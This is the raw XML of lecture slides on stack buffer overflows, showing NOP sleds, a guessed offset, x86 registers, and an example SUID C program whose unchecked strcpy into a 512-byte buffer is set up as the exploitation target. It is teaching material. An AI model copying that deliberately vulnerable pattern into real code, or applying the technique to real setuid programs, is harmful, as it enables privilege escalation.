            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="4400550"/>
            <a:ext cx="838200" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="pct5">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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>NOPs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550930" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="5029200"/>
            <a:ext cx="3733800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550931" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1447800" y="4800600"/>
            <a:ext cx="0" cy="228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32" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4400550"/>
            <a:ext cx="8382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50933" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8382000" y="3314700"/>
            <a:ext cx="0" cy="10287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34" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6400800" y="3257550"/>
            <a:ext cx="1422184"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Stack Pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550935" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="3429000"/>
            <a:ext cx="0" cy="97155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36" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="3714750"/>
            <a:ext cx="69342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37" name="Text Box 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895601" y="3314700"/>
            <a:ext cx="1802738" cy="369332"/>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Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>“Guessed” Offset</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550938" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="529431" y="1387440"/>
            <a:ext cx="8085138" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>series of NOPs is inserted at the beginning of the overflowing buffer so that the jump does not need to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>exactly precise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>In x86, NOP is 0x90</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000"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11271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09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09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09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09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09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09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09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09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09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09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09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09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09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09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09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0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animBg="1"/>
      <p:bldP spid="550924" grpId="0" animBg="1"/>
      <p:bldP spid="550925" grpId="0" animBg="1"/>
      <p:bldP spid="550926" grpId="0"/>
      <p:bldP spid="550927" grpId="0" animBg="1"/>
      <p:bldP spid="550928" grpId="0" animBg="1"/>
      <p:bldP spid="550929" grpId="0" animBg="1"/>
      <p:bldP spid="550930" grpId="0" animBg="1"/>
      <p:bldP spid="550931" grpId="0" animBg="1"/>
      <p:bldP spid="550933" grpId="0" animBg="1"/>
      <p:bldP spid="550934" grpId="0"/>
      <p:bldP spid="550935" grpId="0" animBg="1"/>
      <p:bldP spid="550936" grpId="0" animBg="1"/>
      <p:bldP spid="550937"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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="551939" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We want to exploit the following SUID program:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>vulnerable_function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[512];</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(copy, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>);	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	return 0;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>vulnerable_function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>]);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="3400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The only information available is the buffer size (every time a string that is bigger than 512 characters is passed as a parameter, the program dies with a segmentation fault)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="152971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1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19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19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19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193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193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19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8" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>x86 Registers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003529" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Registers represent the local variables of the processor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There are four 32-bit general purpose registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/ax, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/cx, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/cx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Convention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Accumulator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pointer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to data: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Loop counter: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I/O operations: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003531" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="302895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2" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3028950"/>
            <a:ext cx="9906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ah</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003533" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="3028950"/>
            <a:ext cx="9144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al</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
